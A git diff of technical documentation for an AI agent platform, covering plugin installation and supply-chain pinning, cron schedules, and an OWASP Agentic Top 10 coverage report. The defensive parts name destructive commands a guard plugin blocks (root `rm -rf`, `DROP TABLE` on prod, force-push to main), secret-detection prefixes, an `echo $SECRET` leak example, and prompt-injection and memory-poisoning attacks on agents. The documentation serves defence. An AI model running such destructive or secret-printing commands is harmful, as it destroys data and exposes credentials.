+  -d '{"source": "local://molecule-careful-bash"}'
+```
+
+From GitHub (pinned ref required):
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/plugins \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
+  -d '{"source": "github://Molecule-AI/molecule-plugin-careful-bash#v1.0.0"}'
+```
+
+<Callout type="warn">
+  **Pinned refs are required.** `github://owner/repo` without a `#tag` or `#sha` suffix returns **HTTP 422 Unprocessable Entity**. Always pin to a specific tag (e.g. `#v1.0.0`) or commit SHA (e.g. `#abc1234`). See [Supply Chain Security](#supply-chain-security) for details and the escape hatch.
+</Callout>
+
+The platform resolves the source, stages the plugin files, copies them into the
+workspace container at `/configs/plugins/<name>/`, and triggers an automatic
+workspace restart so the runtime picks up the new plugin.
+
+---
+
+## Uninstalling a Plugin
+
+```bash
+curl -X DELETE http://localhost:8080/workspaces/{id}/plugins/{name} \
+  -H "Authorization: Bearer {token}"
+```
+
+Uninstall removes the plugin directory, cleans up copied skill directories and
+rule markers from `CLAUDE.md`, and triggers an automatic workspace restart.
+
+---
+
+## Listing Plugins
+
+### Platform Registry
+
+List all available plugins in the platform registry:
+
+```bash
+# All plugins
+curl http://localhost:8080/plugins
+
+# Filtered by runtime
+curl http://localhost:8080/plugins?runtime=claude-code
+```
+
+Plugins with no declared `runtimes` field in their manifest are treated as
+"unspecified, try it" and included in filtered results.
+
+### Available for a Workspace
+
+Returns plugins filtered to those supported by the workspace's current runtime:
+
+```bash
+curl http://localhost:8080/workspaces/{id}/plugins/available \
+  -H "Authorization: Bearer {token}"
+```
+
+### Installed on a Workspace
+
+```bash
+curl http://localhost:8080/workspaces/{id}/plugins \
+  -H "Authorization: Bearer {token}"
+```
+
+Each installed plugin is annotated with whether it still supports the
+workspace's current runtime. This lets the canvas grey out plugins that went
+inert after a runtime change.
+
+---
+
+## Runtime Compatibility Check
+
+Before changing a workspace's runtime, check which installed plugins would
+become incompatible:
+
+```bash
+curl "http://localhost:8080/workspaces/{id}/plugins/compatibility?runtime=langgraph" \
+  -H "Authorization: Bearer {token}"
+```
+
+Response:
+
+```json
+{
+  "target_runtime": "langgraph",
+  "compatible": [...],
+  "incompatible": [...],
+  "all_compatible": false
+}
+```
+
+The canvas uses this to show a confirmation dialog before applying a runtime
+change.
+
+---
+
+## Built-in Plugins
+
+### Hook Plugins (ambient enforcement)
+
+These fire automatically via the harness layer. No explicit invocation needed.
+
+| Plugin | Purpose |
+|--------|---------|
+| `molecule-careful-bash` | Refuses `git push --force` to main, `rm -rf` at root, `DROP TABLE` against prod schema. Ships the `careful-mode` skill as documentation. |
+| `molecule-freeze-scope` | Locks edits to a single path glob via `.claude/freeze`. Useful while debugging. |
+| `molecule-audit-trail` | Appends every Edit/Write to `.claude/audit.jsonl` for accountability. |
+| `molecule-session-context` | Auto-loads recent cron-learnings and open PR/issue counts at session start. |
+| `molecule-prompt-watchdog` | Injects warning context when the prompt mentions destructive keywords. |
+
+### Skill Plugins (on-demand)
+
+Invoked explicitly via the `Skill` tool during a conversation.
+
+| Plugin | Purpose |
+|--------|---------|
+| `molecule-skill-code-review` | 16-criteria multi-axis code review rubric. |
+| `molecule-skill-cross-vendor-review` | Adversarial second-model review for noteworthy PRs. |
+| `molecule-skill-llm-judge` | Score whether a deliverable addresses the original request. |
+| `molecule-skill-update-docs` | Sync repo docs after merges. |
+| `molecule-skill-cron-learnings` | Defines the operational-memory JSONL format. |
+
+### Workflow Plugins (slash commands)
+
+Compose skills into repeatable multi-step workflows.
+
+| Plugin | Command | Purpose |
+|--------|---------|---------|
+| `molecule-workflow-triage` | `/triage` | Full PR-triage cycle (gates 1-7 + code-review + merge if green). |
+| `molecule-workflow-retro` | `/retro` | Weekly retrospective issue. |
+
+### Shared Plugins
+
+Loaded by default from the `plugins/` directory at the repo root.
+
+| Plugin | Purpose |
+|--------|---------|
+| `molecule-dev` | Codebase conventions (rules injected into CLAUDE.md) + `review-loop` skill. |
+| `superpowers` | `verification-before-completion`, `test-driven-development`, `systematic-debugging`, `writing-plans`. |
+| `ecc` | General Claude Code guardrails. |
+| `browser-automation` | Puppeteer/CDP-based web scraping and live canvas screenshots. Opt-in per workspace. |
+
+### Platform Opt-in Plugins
+
+Available in the platform registry (`local://`) but not installed by default.
+Add them per workspace or as org defaults as needed.
+
+| Plugin | Tools | Requires | Purpose |
+|--------|-------|----------|---------|
+| `molecule-medo` | `create_medo_app`, `update_medo_app`, `publish_medo_app` | `MEDO_API_KEY` secret | Baidu MeDo app builder integration — create, update, and publish MeDo mini-apps from within an agent. |
+
+#### Installing molecule-medo
+
+```bash
+# 1. Set your API key
+curl -X POST http://localhost:8080/workspaces/{id}/secrets \
+  -H "Authorization: Bearer {token}" \
+  -H "Content-Type: application/json" \
+  -d '{"key": "MEDO_API_KEY", "value": "your-medo-api-key"}'
+
+# 2. Install the plugin (triggers auto-restart)
+curl -X POST http://localhost:8080/workspaces/{id}/plugins \
+  -H "Authorization: Bearer {token}" \
+  -H "Content-Type: application/json" \
+  -d '{"source": "local://molecule-medo"}'
+```
+
+Or add it to `org.yaml`:
+
+```yaml
+workspaces:
+  - name: App Builder
+    plugins: [molecule-medo]
+    secrets:
+      MEDO_API_KEY: "${MEDO_API_KEY}"
+```
+
+---
+
+## Org Template Plugin Resolution
+
+When deploying an org template, per-workspace `plugins:` lists in `org.yaml`
+role overrides **UNION** with `defaults.plugins` (deduplicated, defaults first).
+They do not replace them.
+
+To opt a specific default out for a given role or workspace, prefix the plugin
+name with `!` or `-`:
+
+```yaml
+defaults:
+  plugins:
+    - molecule-careful-bash
+    - molecule-audit-trail
+    - superpowers
+
+workspaces:
+  researcher:
+    role: "Research Analyst"
+    plugins:
+      - browser-automation       # added on top of defaults
+      - "!superpowers"           # opted out of superpowers
+```
+
+Result for the `researcher` workspace:
+`molecule-careful-bash`, `molecule-audit-trail`, `browser-automation`
+
+---
+
+## Install Safeguards
+
+Environment variables that bound the cost and security of a single plugin install:
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Max request body size |
+| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch + copy deadline |
+| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Max staged-tree size |
+| `PLUGIN_ALLOW_UNPINNED` | _(unset)_ | Set to `true` to allow bare `github://owner/repo` refs without a tag or SHA. **Development use only — never set in production.** |
+
+These prevent a slow or malicious source from tying up a handler goroutine or
+exhausting disk space.
+
+---
+
+## Supply Chain Security
+
+The platform enforces two controls to protect against compromised or tampered plugin sources (SAFE-T1102):
+
+### 1. Pinned refs (enforced)
+
+All `github://` installs must include a `#tag` or `#sha` suffix. This ensures the code you audit is exactly what gets installed — a push to the same branch cannot silently swap in different code between your review and a workspace restart.
+
+```
+✅  github://Molecule-AI/my-plugin#v1.2.3       (semver tag)
+✅  github://Molecule-AI/my-plugin#abc1234def   (commit SHA)
+❌  github://Molecule-AI/my-plugin              (→ HTTP 422)
+```
+
+To bypass during local development, set `PLUGIN_ALLOW_UNPINNED=true` in your platform environment. **Do not set this in production.**
+
+### 2. SHA-256 content integrity (optional)
+
+When installing from GitHub, you can provide an expected SHA-256 hash of the staged plugin tree. The platform verifies the hash before completing the install — a mismatch aborts with HTTP 422 and cleans up the staging directory.
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/plugins \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
+  -d '{
+    "source": "github://Molecule-AI/my-plugin#v1.2.3",
+    "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+  }'
+```
+
+**How the hash is computed:** Walk all non-manifest files in the staged plugin tree, sort by relative path, concatenate as `<rel-path>\x00<content>`, and compute `sha256.Sum256`. The hash is lowercase hex.
+
+You can pre-compute the expected hash from a clean checkout:
+```bash
+# In a clean clone of the plugin repo at the target ref:
+find . -type f ! -name 'manifest.json' | sort | \
+  xargs -I{} sh -c 'printf "%s\x00" "{}" && cat "{}"' | sha256sum
+```
+
+---
+
+## Plugin Download (External Workspaces)
+
+External workspaces (those running outside Docker) can pull plugins as gzipped
+tarballs:
+
+```bash
+curl http://localhost:8080/workspaces/{id}/plugins/{name}/download \
+  -H "Authorization: Bearer {token}" \
+  -o plugin.tar.gz
+```
+
+An optional `?source=github://owner/repo` query parameter lets external
+workspaces pull from upstream repos without the platform pre-staging them.
+Defaults to `local://<name>` when omitted.
+
+---
+
+## Org-Level Plugin Governance
+
+Tenant admins can restrict which plugins workspaces in their org are permitted to load using a per-org allowlist. When an allowlist is configured, workspaces can only install plugins explicitly listed — all other installs are blocked at load time.
+
+### Managing the allowlist
+
+```bash
+# Allow a plugin in the org
+curl -X POST http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist \
+  -H "Authorization: Bearer <admin-token>" \
+  -H "Content-Type: application/json" \
+  -d '{"plugin_name": "molecule-audit-trail"}'
+
+# Remove a plugin from the allowlist
+curl -X DELETE http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist/molecule-audit-trail \
+  -H "Authorization: Bearer <admin-token>"
+```
+
+Both endpoints require `AdminAuth`. `orgId` is the org's UUID (set via `MOLECULE_ORG_ID` for SaaS tenants; in self-hosted single-org mode this is the org record created at first startup).
+
+### Behaviour when an allowlist is configured
+
+| Scenario | Result |
+|----------|--------|
+| No allowlist entries for the org | All plugins are permitted (default; backward-compatible) |
+| Allowlist has at least one entry | Only listed plugins may be installed; others return `403 Forbidden` |
+| Plugin already installed when allowlist was created | Pre-existing installs are not removed, but the plugin cannot be re-installed if later uninstalled |
+
+### Relationship to supply-chain pinning
+
+The governance allowlist and supply-chain pinning (`PLUGIN_ALLOW_UNPINNED`) are independent:
+- The **allowlist** controls *which* plugins workspaces can load.
+- **Pinning** controls *how* plugins must be referenced (exact commit/tag, never `latest`).
+
+Both can be active simultaneously — the most restrictive rule wins.
+
+---
+
+## API Reference
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/plugins` | List plugin registry (supports `?runtime=` filter) |
+| GET | `/plugins/sources` | List registered install-source schemes |
+| GET | `/workspaces/:id/plugins` | List installed plugins |
+| POST | `/workspaces/:id/plugins` | Install a plugin (`{"source": "scheme://spec"}`) |
+| DELETE | `/workspaces/:id/plugins/:name` | Uninstall a plugin |
+| GET | `/workspaces/:id/plugins/available` | Available plugins filtered by workspace runtime |
+| GET | `/workspaces/:id/plugins/compatibility?runtime=X` | Preflight runtime-change compatibility check |
+| GET | `/workspaces/:id/plugins/:name/download` | Download plugin as tarball (external workspaces) |
+| POST | `/admin/orgs/:orgId/plugins/allowlist` | Add a plugin to the org allowlist (AdminAuth) |
+| DELETE | `/admin/orgs/:orgId/plugins/allowlist/:name` | Remove a plugin from the org allowlist (AdminAuth) |
--- a/content/docs/plugins/agentskills-compat.md
+++ b/content/docs/plugins/agentskills-compat.md
@ -1,3 +1,6 @@
+---
+title: "Molecule AI plugins and the agentskills.io standard"
+---
 # Molecule AI plugins and the agentskills.io standard

 > **TL;DR** — every skill inside a Molecule AI plugin is a spec-compliant
--- a/content/docs/plugins/sources.md
+++ b/content/docs/plugins/sources.md
@ -1,3 +1,6 @@
+---
+title: "Plugin install sources"
+---
 # Plugin install sources

 > **TL;DR** — plugin **sources** (where a plugin comes from) and plugin
--- a/content/docs/research/cognee-architecture-deep-dive.md
+++ b/content/docs/research/cognee-architecture-deep-dive.md
@ -1,3 +1,6 @@
+---
+title: "Cognee Architecture Deep-Dive — Workspace Isolation"
+---
 # Cognee Architecture Deep-Dive — Workspace Isolation

 **Date:** 2026-04-20
--- a/content/docs/research/cognee-isolation-eval.md
+++ b/content/docs/research/cognee-isolation-eval.md
@ -1,3 +1,6 @@
+---
+title: "Cognee Workspace Isolation Evaluation"
+---
 # Cognee Workspace Isolation Evaluation

 **Date:** 2026-04-20
--- a/content/docs/schedules.mdx
+++ b/content/docs/schedules.mdx
@ -0,0 +1,336 @@
+---
+title: Schedules
+description: Run recurring prompts on cron schedules — automated audits, reports, and maintenance.
+---
+
+## Overview
+
+Schedules let you run recurring prompts against a workspace on a cron schedule.
+Each tick fires an A2A `message/send` into the workspace, so the agent
+processes the prompt as if it received a normal message. This enables automated
+audits, daily reports, weekly retrospectives, and any other recurring task.
+
+The scheduler polls the `workspace_schedules` table every 30 seconds. When a
+schedule's `next_run_at` has passed, the scheduler fires the prompt and
+computes the next run time.
+
+```
+Scheduler (30s poll) ──> workspace_schedules table
+                              │
+                  next_run_at <= now?
+                              │
+                    ┌─────────┴──────────┐
+                    │  A2A message/send   │──> Workspace Agent
+                    │  (callerID=system:  │
+                    │   scheduler)        │
+                    └─────────────────────┘
+```
+
+---
+
+## Creating a Schedule
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/schedules \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
+  -d '{
+    "name": "Daily Security Audit",
+    "cron_expr": "0 9 * * *",
+    "timezone": "America/New_York",
+    "prompt": "Run a security audit of all open PRs. Check for leaked secrets, SQL injection, and auth bypass.",
+    "enabled": true
+  }'
+```
+
+**Required fields:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `cron_expr` | string | Standard cron expression (5-field: minute, hour, day-of-month, month, day-of-week) |
+| `prompt` | string | The text sent to the workspace as an A2A message each tick |
+
+**Optional fields:**
+
+| Field | Type | Default | Description |
+|-------|------|---------|-------------|
+| `name` | string | `""` | Human-readable label |
+| `timezone` | string | `"UTC"` | IANA timezone for cron evaluation (e.g. `America/New_York`, `Asia/Tokyo`) |
+| `enabled` | bool | `true` | Whether the schedule fires |
+
+The timezone is validated against Go's `time.LoadLocation` on create and update.
+The cron expression is validated and the next run time is computed immediately.
+
+---
+
+## CRUD Operations
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/workspaces/:id/schedules` | List all schedules for a workspace |
+| POST | `/workspaces/:id/schedules` | Create a new schedule |
+| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update a schedule (partial update via COALESCE) |
+| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete a schedule |
+
+### Update
+
+PATCH accepts any subset of fields. Only provided fields are changed — the
+handler uses `COALESCE` in SQL so omitted fields retain their current values.
+If `cron_expr` or `timezone` changes, the next run time is recomputed.
+
+```bash
+curl -X PATCH http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
+  -d '{"enabled": false}'
+```
+
+### Delete
+
+```bash
+curl -X DELETE http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
+  -H "Authorization: Bearer {token}"
+```
+
+All schedule operations are scoped to the owning workspace ID to prevent IDOR.
+
+---
+
+## Manual Trigger
+
+Fire a schedule immediately, outside its cron cadence:
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/run \
+  -H "Authorization: Bearer {token}"
+```
+
+Returns the schedule's prompt so the frontend can POST it to
+`/workspaces/:id/a2a`. This keeps the handler stateless.
+
+---
+
+## Run History
+
+View the last 20 runs for a schedule, including error details for failed runs:
+
+```bash
+curl http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/history \
+  -H "Authorization: Bearer {token}"
+```
+
+Response:
+
+```json
+[
+  {
+    "timestamp": "2026-04-16T09:00:02Z",
+    "duration_ms": 4523,
+    "status": "success",
+    "error_detail": "",
+    "request": {"schedule_id": "...", "prompt": "..."}
+  },
+  {
+    "timestamp": "2026-04-15T09:00:01Z",
+    "duration_ms": null,
+    "status": "error",
+    "error_detail": "A2A proxy returned 503: workspace container not running",
+    "request": {"schedule_id": "...", "prompt": "..."}
+  }
+]
+```
+
+History is pulled from the `activity_logs` table filtered by
+`activity_type = 'cron_run'` and the schedule ID in the request body.
+
+---
+
+## Source Field
+
+Each schedule has a `source` field that tracks how it was created:
+
+| Value | Meaning |
+|-------|---------|
+| `template` | Seeded by an org template import or bundle import. On re-import, only `template`-source rows are refreshed — `runtime` rows survive. |
+| `runtime` | Created via the Canvas UI or API. These are user-owned and never overwritten by re-imports. |
+
+---
+
+## Status Values
+
+The `last_status` field on a schedule tracks the outcome of the most recent
+run:
+
+| Status | Meaning |
+|--------|---------|
+| `success` | The A2A message was delivered and the workspace acknowledged it. |
+| `error` | The A2A proxy returned a non-2xx status. `last_error` contains details. |
+| `skipped` | The workspace was busy (concurrency-aware skip). The scheduler detected `active_tasks > 0` and deferred the run to avoid overloading the agent. |
+
+---
+
+## Schedule Health Endpoint
+
+Peer workspaces can monitor each other's schedule health without admin auth:
+
+```bash
+curl http://localhost:8080/workspaces/{id}/schedules/health \
+  -H "X-Workspace-ID: {callerWorkspaceId}" \
+  -H "Authorization: Bearer {callerToken}"
+```
+
+This endpoint returns execution-state fields only (`last_run_at`,
+`last_status`, `run_count`, `next_run_at`, `last_error`). It deliberately
+omits `prompt` and `cron_expr` so sensitive task content is never exposed to
+peer workspaces.
+
+**Auth rules** (mirrors the A2A proxy pattern):
+- `X-Workspace-ID` header required to identify the caller
+- Caller's own bearer token validated (legacy workspaces grandfathered)
+- `registry.CanCommunicate(callerID, workspaceID)` must return true
+- System callers (`system:*`, `webhook:*`, `test:*`) bypass checks
+- Self-calls always allowed
+
+---
+
+## Cross-Org Schedule Health (Admin)
+
+Operators can retrieve schedule health for **every workspace in the org** in a single call:
+
+```bash
+curl http://localhost:8080/admin/schedules/health \
+  -H "Authorization: Bearer <admin-token>"
+```
+
+Requires `AdminAuth`. Returns an array covering every schedule across every workspace:
+
+```json
+[
+  {
+    "schedule_id":        "uuid",
+    "workspace_id":       "uuid",
+    "workspace_name":     "security-auditor",
+    "expression":         "0 */6 * * *",
+    "enabled":            true,
+    "last_fired_at":      "2026-04-18T12:00:00Z",
+    "next_scheduled_at":  "2026-04-18T18:00:00Z",
+    "consecutive_empty":  0,
+    "phantom_detected":   false
+  }
+]
+```
+
+| Field | Description |
+|-------|-------------|
+| `last_fired_at` | Timestamp of the most recent run attempt (null if never fired) |
+| `next_scheduled_at` | When the scheduler will next attempt this schedule |
+| `consecutive_empty` | Count of consecutive runs that fired but received no task completion — an early indicator of a stuck or unresponsive workspace |
+| `phantom_detected` | `true` if the schedule appears in the DB but its workspace has been removed; these are safe to delete |
+
+Use this endpoint to audit cron health org-wide before a maintenance window, or to identify schedules that haven't fired when expected.
+
+---
+
+## Scheduler Internals
+
+### Poll Loop
+
+The scheduler runs a 30-second poll loop. Each tick:
+
+1. Queries up to 50 due schedules (`next_run_at <= now AND enabled = true`)
+2. Fires up to 10 concurrently via a semaphore
+3. Each fire sends an A2A `message/send` with a 5-minute timeout
+4. Updates `last_run_at`, `run_count`, `last_status`, and `next_run_at`
+5. Logs the run to `activity_logs` with `activity_type = 'cron_run'`
+
+### Panic Recovery
+
+The scheduler recovers from panics inside the tick function. A single bad row,
+malformed cron expression, or database blip cannot permanently kill the
+scheduler. Without this recovery, the goroutine dies silently and the only
+signal is "no crons firing."
+
+### Liveness Watchdog
+
+The scheduler reports heartbeats to the `supervised` subsystem. The
+`/admin/liveness` endpoint exposes per-subsystem ages, so operators can detect
+a stuck scheduler before it causes a missed-cron outage.
+
+`Scheduler.Healthy()` returns true if the scheduler has completed a tick within
+the last 60 seconds (2x the poll interval). Returns false before the first tick
+or if the scheduler is stalled.
+
+---
+
+## Examples
+
+### Hourly Security Audit
+
+```json
+{
+  "name": "Hourly Security Scan",
+  "cron_expr": "0 * * * *",
+  "timezone": "UTC",
+  "prompt": "Scan all open PRs for leaked secrets, SQL injection patterns, and auth bypass vulnerabilities. Report findings as a summary."
+}
+```
+
+### Daily Standup Report
+
+```json
+{
+  "name": "Daily Standup",
+  "cron_expr": "0 9 * * 1-5",
+  "timezone": "America/Los_Angeles",
+  "prompt": "Generate a standup report: what was completed yesterday, what is planned today, and any blockers. Post to the team channel."
+}
+```
+
+### Weekly Retrospective
+
+```json
+{
+  "name": "Weekly Retro",
+  "cron_expr": "0 17 * * 5",
+  "timezone": "America/New_York",
+  "prompt": "Write a weekly retrospective covering PRs merged, issues closed, cron failures, and code review findings. Post as a GitHub issue."
+}
+```
+
+### Nightly Cleanup
+
+```json
+{
+  "name": "Nightly Cleanup",
+  "cron_expr": "0 2 * * *",
+  "timezone": "UTC",
+  "prompt": "Archive stale branches older than 30 days. Close issues that have been inactive for 60 days with a comment explaining the auto-close policy.",
+  "enabled": true
+}
+```
+
+---
+
+## Timezone Handling
+
+All cron expressions are evaluated in the specified timezone. If no timezone is
+provided, `UTC` is used. The timezone must be a valid IANA timezone string
+(e.g. `America/New_York`, `Europe/London`, `Asia/Tokyo`).
+
+When a schedule's `cron_expr` or `timezone` is updated, the `next_run_at` is
+immediately recomputed using the new values. This prevents schedules from
+firing at unexpected times after a timezone change.
+
+---
+
+## API Reference
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/workspaces/:id/schedules` | List schedules |
+| POST | `/workspaces/:id/schedules` | Create schedule |
+| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update schedule |
+| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete schedule |
+| POST | `/workspaces/:id/schedules/:scheduleId/run` | Manual trigger |
+| GET | `/workspaces/:id/schedules/:scheduleId/history` | Run history (last 20) |
+| GET | `/workspaces/:id/schedules/health` | Health view (open to peers) |
--- a/content/docs/security/index.mdx
+++ b/content/docs/security/index.mdx
@ -0,0 +1,9 @@
+---
+title: Security
+description: Security guides, advisories, and coverage reports for the Molecule AI platform.
+---
+
+## In this section
+
+- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
+  Three HIGH-severity findings for self-hosted operators
--- a/content/docs/security/owasp-agentic-top-10.mdx
+++ b/content/docs/security/owasp-agentic-top-10.mdx
@ -0,0 +1,345 @@
+---
+title: OWASP Agentic AI Top 10 Coverage
+description: Mapping the OWASP Agentic AI Top 10 to Molecule AI security controls — honest coverage report.
+---
+
+## Overview
+
+This page documents Molecule AI's coverage of the
+[OWASP Agentic AI Top 10](https://owasp.org/agentic-ai-top-10/) security risks
+for AI agents and agentic systems. Coverage is assessed against the platform as
+shipped — not the roadmap or planned features.
+
+**Honest verdict: 5 COVERED / 3 PARTIAL / 2 NOT COVERED**
+
+| OWASP ID | Risk | Status |
+|---|---|---|
+| [A01](#a01-prompt-injection) | Prompt Injection | ✅ COVERED |
+| [A02](#a02-sensitive-information-disclosure) | Sensitive Information Disclosure | ✅ COVERED |
+| [A03](#a03-unbounded-resource-consumption) | Unbounded Resource Consumption | ✅ COVERED |
+| [A04](#a04-sandboxing-escapes) | Sandboxing Escapes | ⚠️ PARTIAL |
+| [A05](#a05-agent-human-relationship-dysfunction) | Agent-Human Relationship Dysfunction | ⚠️ PARTIAL |
+| [A06](#a06-memory-poisoning) | Memory Poisoning | ✅ COVERED |
+| [A07](#a07-cascade-hallucinations) | Cascade Hallucinations | ✅ COVERED |
+| [A08](#a08-overreliance) | Overreliance | ⚠️ PARTIAL |
+| [A09](#a09-supply-chain-vulnerabilities) | Supply Chain Vulnerabilities | ❌ NOT COVERED |
+| [A10](#a10-improper-agency-grants) | Improper Agency Grants | ❌ NOT COVERED |
+
+---
+
+## A01 — Prompt Injection ✅ COVERED
+
+**Risk:** An attacker embeds malicious instructions in external data (files, web
+content, user messages) that the agent treats as authoritative commands.
+
+**Molecule AI controls:**
+
+- **Workspace isolation:** Each workspace runs in its own container with an
+  isolated filesystem. A prompt injection in workspace A cannot reach workspace
+  B's memory or secrets.
+- **Secrets never in tool context:** Secrets stored via the platform API are
+  injected into the container's environment at runtime — they are never passed
+  as tool arguments or embedded in LLM prompts where external data might
+  reference them.
+- **A2A peer validation:** A2A messages between workspaces include sender identity
+  verification. Agents cannot impersonate another workspace's agent.
+- **Admin-level input filtering:** The platform API applies input validation
+  before data reaches agent prompts.
+
+**Residual risk:** Prompt injection within a single workspace (e.g., a
+malicious file processed by the agent) is not neutralized — this is the
+responsibility of the agent's own prompt engineering and the LLM's alignment.
+
+---
+
+## A02 — Sensitive Information Disclosure ✅ COVERED
+
+**Risk:** An agent exposes confidential data — credentials, PII, internal
+documents — through tool calls, logs, or responses.
+
+**Molecule AI controls:**
+
+- **Encrypted secrets at rest:** Workspace secrets are encrypted with
+  `SECRETS_ENCRYPTION_KEY` (AES-256) before storage. Plaintext never hits the
+  database.
+- **Secrets scoped per-workspace:** A token scoped to workspace A cannot access
+  workspace B's secrets.
+- **Memory access controls:** The MCP server's memory tools respect workspace
+  boundaries. Agents cannot read another workspace's memory unless explicitly
+  shared via the `memory_set` peer API.
+- **Langfuse observability:** Traces are visible to platform operators; audit
+  logs show which agent accessed which secret key. Agents should not log
+  secrets — this is enforced through pre-commit hooks in the workspace template
+  (the `sk-ant-` / `ghp_` / `AKIA` pattern detector).
+- **Token display-once policy:** Workspace bearer tokens are returned in plaintext
+  exactly once at creation and never shown again.
+
+**Residual risk:** If an agent deliberately calls a tool that prints a secret
+value (e.g., `echo $SECRET` in a shell tool), the platform cannot prevent this.
+Agent behavior inside the workspace is ultimately constrained by the tools
+exposed and the LLM's instruction following.
+
+---
+
+## A03 — Unbounded Resource Consumption ✅ COVERED
+
+**Risk:** An agent makes excessive LLM calls, processes unbounded data, or holds
+memory in a loop, causing cost overruns or DoS.
+
+**Molecule AI controls:**
+
+- **Tier-based resource limits:** Each workspace tier has defined memory and CPU
+  caps enforced by the container scheduler. A runaway agent hits OOM before
+  consuming unbounded resources.
+- **Rate limiting:** The platform enforces `RATE_LIMIT` requests/min per client.
+  This caps the rate at which agents can issue tool calls or make API requests.
+- **Activity retention and cleanup:** `ACTIVITY_RETENTION_DAYS` (default 7) and
+  `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6) automatically purge old activity
+  logs, preventing unbounded log growth.
+- **Workspace hibernation:** Idle workspaces can be hibernated, releasing
+  container resources until the next task arrives.
+- **LLM cost tracking:** Workspace usage is tracked per-token-model, giving
+  operators visibility into spend per workspace.
+
+**Residual risk:** The platform does not enforce per-request token budgets or
+LLM call counts within a task. A sophisticated agent can still issue many
+calls within a single request burst. Operators should monitor Langfuse traces
+for unusual activity patterns.
+
+---
+
+## A04 — Sandboxing Escapes ⚠️ PARTIAL
+
+**Risk:** An agent escapes the container sandbox and accesses the host system,
+neighboring containers, or the internal network.
+
+**Molecule AI controls:**
+
+- **Container isolation:** Workspace containers are isolated Docker containers
+  on the host. They do not run as privileged and have a non-root default user.
+- **Bind-mount scoping:** The workspace directory is the only host path bind-mounted
+  into the container. Other host paths are not accessible.
+- **Network namespace isolation:** Workspace containers are on a Docker bridge
+  network. Direct access to host services requires explicit platform routing.
+
+**Gaps:**
+
+- **Privileged tier (TIER4):** `TIER4_MEMORY_MB` workspaces run with fewer
+  restrictions. A compromised agent in a TIER4 workspace has more ability to
+  probe the host. This is a known trade-off for full-host workloads.
+- **No seccomp/AppArmor/SELinux profiles:** The platform does not currently
+  apply mandatory access control profiles beyond Docker's default isolation.
+- **No egress filtering by default:** Workspace containers can reach arbitrary
+  external URLs unless the operator configures network-level egress rules.
+
+**Recommendation:** For untrusted agents, restrict to TIER2 or below. Configure
+egress filtering at the Docker host or Kubernetes network policy level.
+
+---
+
+## A05 — Agent-Human Relationship Dysfunction ⚠️ PARTIAL
+
+**Risk:** The human operator loses meaningful oversight of agent actions — the
+agent acts without notification, makes irreversible decisions, or misrepresents
+its reasoning.
+
+**Molecule AI controls:**
+
+- **A2A `notify_user`:** Agents can push notifications to the canvas, keeping the
+  human informed of progress and key decisions. This is an opt-in capability for
+  agents to use.
+- **Langfuse observability:** All LLM calls and tool executions are traced.
+  Platform operators can review the full decision trace for any workspace.
+- **Manual override endpoints:** Admins can pause, resume, or terminate any
+  workspace through the `/admin/*` API endpoints.
+- **Activity logs:** All agent actions are logged with timestamps and caller identity.
+
+**Gaps:**
+
+- **`notify_user` is not mandatory:** The workspace template does not require
+  agents to notify humans of significant actions. An agent can run without
+  ever pushing a canvas notification.
+- **No confirmation gates:** The platform does not provide a mechanism for an
+  agent to pause and wait for human approval before taking a consequential
+  action (e.g., deleting a file, sending an external API request).
+- **No explanation requirements:** Agents are not required to log their reasoning
+  before taking actions. Langfuse traces show tool calls but not the agent's
+  internal chain-of-thought unless the agent explicitly logs it.
+
+**Recommendation:** Configure agents to call `notify_user` at key decision
+points. Monitor Langfuse for silent agent activity.
+
+---
+
+## A06 — Memory Poisoning ✅ COVERED
+
+**Risk:** An attacker manipulates the agent's memory store to inject malicious
+instructions or biases that the agent reads back and acts on.
+
+**Molecule AI controls:**
+
+- **Memory write authorization:** `memory_set` and `memory_set_peer` require
+  valid workspace authentication. External attackers cannot write to a
+  workspace's memory without a valid token.
+- **Secrets excluded from memory:** Secrets are stored separately from the
+  general-purpose memory store and are not readable via the memory tools.
+- **Per-workspace memory isolation:** Memory keys are namespaced to the
+  workspace. Agents in workspace A cannot write to workspace B's memory unless
+  an explicit A2A `memory_set_peer` call is made from B to A.
+- **Semantic search gating:** The `search_memory` tool operates only on the
+  authenticated workspace's memory. Cross-workspace search is not permitted
+  without explicit peer delegation.
+
+**Residual risk:** A compromised or malicious agent within a workspace can
+overwrite its own memory with poisoned data. This is an agent-level concern,
+not a platform-level control.
+
+---
+
+## A07 — Cascade Hallucinations ✅ COVERED
+
+**Risk:** An agent generates incorrect outputs that are fed downstream as
+ground-truth, compounding errors across multiple agent calls or tool chains.
+
+**Molecule AI controls:**
+
+- **Langfuse trace visibility:** All agent outputs and tool call results are
+  captured in Langfuse traces. Operators can identify hallucinated outputs
+  by reviewing traces, especially when downstream tool calls fail or produce
+  implausible results.
